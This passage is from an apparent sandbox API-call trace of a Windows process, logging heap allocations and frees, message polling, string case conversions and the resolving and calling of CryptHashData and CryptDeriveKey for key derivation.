hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.001] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0088.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9c88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0088.002] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0088.002] CryptHashData (hHash=0x9a3d00, pbData=0x2a717c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69790 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0088.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0088.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0088.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0088.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.005] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.005] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.005] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.005] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.005] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0088.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.006] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0088.006] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0088.006] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0088.006] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.006] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0088.006] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0088.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9df0 [0088.006] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9df0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0088.007] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3d00, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a40c0) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f70 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0088.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f70 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0088.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 